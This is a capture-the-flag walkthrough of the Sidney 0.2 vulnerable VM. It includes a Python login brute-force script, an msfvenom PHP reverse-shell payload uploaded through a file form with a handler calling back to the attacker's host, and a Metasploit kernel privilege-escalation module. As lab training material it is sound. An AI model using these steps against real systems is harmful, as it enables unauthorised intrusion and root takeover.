
Hack the Sidney VM (CTF Challenge)

XxDat-WayxX

Today we take up a boot2root challenge by Nightmares: Sidney: 0.2, the third challenge he has generously put together. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM; you still need to snag the flag. You can download the VM from https://www.vulnhub.com/entry/sidney-02,149/

Breaching Methodologies:
  • Network scanning (netdiscover, Nmap)
  • Web server enumeration (view source)
  • Directory brute-force (dirb)
  • Generate our own dictionary (crunch)
  • Dictionary attack on the login form (Burp Suite)
  • Log in to the admin console
  • Generate a PHP backdoor (msfvenom)
  • Upload and execute the backdoor
  • Reverse connection (Metasploit multi/handler)
  • Kernel privilege escalation (Metasploit)
  • Gain root access
  • Locate flag.zip
  • Crack the archive password (fcrackzip) and read the flag

First we need to find out which IP address the VM got from DHCP, so scan the local network with netdiscover:

Code:
netdiscover

1.png


Now that we have located our target IP, 192.168.1.103, the next step is a full port scan: -p- covers all 65535 TCP ports and -A adds service/version detection, OS detection and the default scripts.

Code:
nmap -A -p- 192.168.1.103

2.png


The scan shows port 80 open, which means a web server, so let's open the IP in a browser.

3.png


Then we decided to look into its page source.

4.png


The source points to another path. We opened it in the browser (192.168.1.103/commorode64) and, luckily, found another page.

5.png


Reading this page's source tells you that the username is robhubbard, and further down there are hints about the password:

  • the password is lowercase
  • the password is 3 letters followed by 4 digits
  • it is related to the C=64 (Commodore 64) sound chip

6.png


Next we run dirb for a web directory brute-force. It lists many directories, but index.php is the interesting one, so we explore it.

7.png


Opening it presents a login form asking for a username and password. We already know the username; we just have to find the password.

8.png


With these hints about the password, we first look up the C=64 sound chip on Wikipedia and find:

9.png


We know the first three characters of the password are letters, and the Commodore 64's sound chip is the SID, the MOS Technology 6581, so our best guess is that the password starts with mos.

That leaves the four digits. Rather than guess, we generate every candidate with crunch: 7 7 fixes the length at seven characters, and in the -t pattern mos%%%% the letters are literal while each % stands for one digit, giving 10,000 words:

Code:
crunch 7 7 -t mos%%%% -o /root/Desktop/dict.txt

10.png


crunch writes the dictionary to /root/Desktop/dict.txt.

Then run a dictionary attack against the login form with Burp Suite Intruder, loading dict.txt as the payload list for the password field. The one request whose response differs from the rest (status or length) reveals the password, as shown below:

11.png
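
The crunch run and the Burp Intruder attack above can be reproduced in a few lines of Python. The following is an added example, not code from the walkthrough or from Hacking Articles: crunch_pattern expands a -t pattern the way crunch does for the @, , and % placeholders (the symbol set used for ^ is an assumption), and brute_force_login walks the candidates until one is accepted. The HTTP sender assumes the form posts fields named username and password and that a failed login echoes some marker text; both are assumptions you must confirm from the real form, and the secret in the offline demo is constructed, not the VM's password.

```python
"""Added example: generate the 'mos%%%%' dictionary and run the login
dictionary attack in plain Python (not the walkthrough's own code)."""
import itertools
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Iterator, Optional

# crunch -t placeholders: '@' lowercase, ',' uppercase, '%' digit, '^' symbol.
# The symbol set below is an assumption; crunch's own list may differ.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def crunch_pattern(pattern: str) -> Iterator[str]:
    """Yield every word matching a crunch -t pattern, in crunch's order
    (rightmost placeholder varies fastest). Other characters are literal,
    so crunch_pattern("mos%%%%") matches `crunch 7 7 -t mos%%%%`."""
    slots = [CRUNCH_CLASSES.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def brute_force_login(
    candidates: Iterable[str],
    try_login: Callable[[str, str], bool],
    username: str,
) -> Optional[str]:
    """Try each candidate password for username; return the first one that
    try_login accepts, or None when the whole list is exhausted."""
    for password in candidates:
        if try_login(username, password):
            return password
    return None


def make_http_login(
    url: str,
    failure_marker: str,
    user_field: str = "username",  # assumed field names; read the real form
    pass_field: str = "password",
) -> Callable[[str, str], bool]:
    """Build a try_login callable that POSTs the form the way Intruder would.
    Success is inferred as in Burp: the response no longer contains the text
    that a failed login shows (failure_marker)."""
    def try_login(username: str, password: str) -> bool:
        data = urllib.parse.urlencode(
            {user_field: username, pass_field: password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except urllib.error.HTTPError as err:  # 401/403 etc. count as failure
            body = err.read().decode("utf-8", errors="replace")
        return failure_marker not in body
    return try_login


def demo_oracle(username: str, password: str) -> bool:
    """Constructed stand-in for the login form so the demo runs offline.
    The secret here is invented; it is not the VM's real password."""
    return (username, password) == ("robhubbard", "mos1234")


if __name__ == "__main__":
    # Against the VM you would build the callable with, for example,
    # make_http_login("http://192.168.1.103/commorode64/index.php", "Invalid")
    # where the URL and marker text are assumptions to verify first.
    hit = brute_force_login(crunch_pattern("mos%%%%"), demo_oracle, "robhubbard")
    print("password:", hit)
```

Intruder's "different response length" heuristic and failure_marker are the same idea; if the application answers every login with 200 OK and identical markup, compare the Set-Cookie header or a redirect instead.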


Now enter the username and the recovered password on the index.php page:

12.png


After logging in you land on the following page, which offers a file upload. This is where we will upload a malicious PHP file:

13.png


To generate that PHP payload, open a terminal on Kali and run:

Code:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

At the same time, start a multi/handler listener in the Metasploit framework.

14.png


msfvenom's raw PHP output is wrapped in a comment marker ahead of the <?php tag, so copy the code from <?php through die(); into a file with a .php extension, so that it starts with the PHP open tag. Browse to that file in the upload form and upload it. Once it is uploaded, request the uploaded file's URL in the browser so the web server executes it and it connects back to the handler.

15.png


Meanwhile, in the Metasploit terminal, set up the multi/handler listener and wait for the meterpreter session:

Code:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.108
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

The image below shows meterpreter session 1 opened. The task is not finished yet; we still need to escalate privileges.

16.png


Running sysinfo tells us the target runs a 4.4 Linux kernel; searching Metasploit for a matching local exploit turns up the BPF privilege escalation module. Kernel exploits can crash the target when they fail, so snapshot the VM first, then run:

Code:
msf > use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set session 1
msf exploit(linux/local/bpf_priv_esc) > set lhost 192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport 8888
msf exploit(linux/local/bpf_priv_esc) > exploit
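
Before running that module, or any kernel exploit, it is worth confirming the target actually matches. linux/local/bpf_priv_esc exploits CVE-2016-4557, a use-after-free in the BPF verifier's map file-descriptor handling that was fixed in Linux 4.5.5, and it has to call bpf() as an unprivileged user. The precheck below is an added example, not part of the walkthrough or of the Metasploit module; feed it the output of `uname -r` and `cat /proc/sys/kernel/unprivileged_bpf_disabled` taken from the meterpreter shell. The 4.4 lower bound (when unprivileged bpf() appeared) and the sysctl requirement are assumptions of this example, and distribution kernels backport fixes, so a version inside the range is necessary, not sufficient: check the distro advisory as well.

```python
"""Added example (not the walkthrough's or Metasploit's code): sanity-check a
Linux target before launching exploit/linux/local/bpf_priv_esc."""
import re
from typing import List, Tuple

# CVE-2016-4557 was fixed upstream in Linux 4.5.5. Unprivileged bpf(), which
# the exploit relies on, first appeared in 4.4, so that is the assumed lower
# bound. Distro kernels backport fixes, so this is a necessary check only.
FIRST_AFFECTED = (4, 4, 0)
FIXED_IN = (4, 5, 5)


def parse_kernel_release(release: str) -> Tuple[int, int, int]:
    """Turn a `uname -r` string such as '4.4.0-21-generic' into (4, 4, 0)."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def version_in_affected_range(release: str) -> bool:
    """True when the upstream version number lies in [4.4.0, 4.5.5)."""
    return FIRST_AFFECTED <= parse_kernel_release(release) < FIXED_IN


def bpf_priv_esc_precheck(
    uname_r: str, unprivileged_bpf_disabled: str
) -> Tuple[bool, List[str]]:
    """Return (go, reasons). uname_r is the output of `uname -r`;
    unprivileged_bpf_disabled is the content of
    /proc/sys/kernel/unprivileged_bpf_disabled ('0' means bpf() is allowed
    for normal users). reasons lists every failed prerequisite."""
    reasons: List[str] = []
    if not version_in_affected_range(uname_r):
        reasons.append(
            f"kernel {uname_r.strip()} is outside the affected range 4.4 to 4.5.4")
    if unprivileged_bpf_disabled.strip() != "0":
        reasons.append(
            "kernel.unprivileged_bpf_disabled is set; the exploit needs bpf() "
            "from an unprivileged process")
    return (not reasons, reasons)


if __name__ == "__main__":
    # Constructed sample inputs, in the form a 4.4 Ubuntu box would report.
    samples = [
        ("4.4.0-21-generic", "0\n"),
        ("4.4.0-21-generic", "1\n"),
        ("4.15.0-20-generic", "0\n"),
    ]
    for release, sysctl in samples:
        go, why = bpf_priv_esc_precheck(release, sysctl)
        print(release.strip(), "->", "go" if go else "skip: " + "; ".join(why))
```

If the check says go, run the module as shown; if it says skip, look for a different escalation path rather than risk a kernel panic on the only shell you have.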

This opens a second meterpreter session with root privileges. Now let's go to root's home directory and look for the flag:

Code:
cd /root
ls

18.png


There is a hint.gif file; let's download it:

Code:
download hint.gif /root/Desktop/

19.1.png


Opening hint.gif shows the image below, but we could not extract a usable hint from the conversation in it.

19.2.png


So instead we walk the hidden directories under /root:

Code:
cd .commodor64
ls
cd .miami
ls
cd vice
ls

Here is the flag.zip file; download it to the desktop with:

Code:
download flag.zip /root/Desktop/

19.png


flag.zip is password-protected, so we run a dictionary attack on it with rockyou.txt. In the command below, -D selects dictionary mode, -p names the wordlist, -u has fcrackzip verify each candidate with unzip to weed out false positives, and -v is verbose:

Code:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip

At last, fcrackzip prints the password. Now unzip flag.zip:

Code:
unzip flag.zip

It prompts for the password; enter the one just recovered.

21.png


And yay! We have captured the flag. Enjoy it.

22.png


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
 
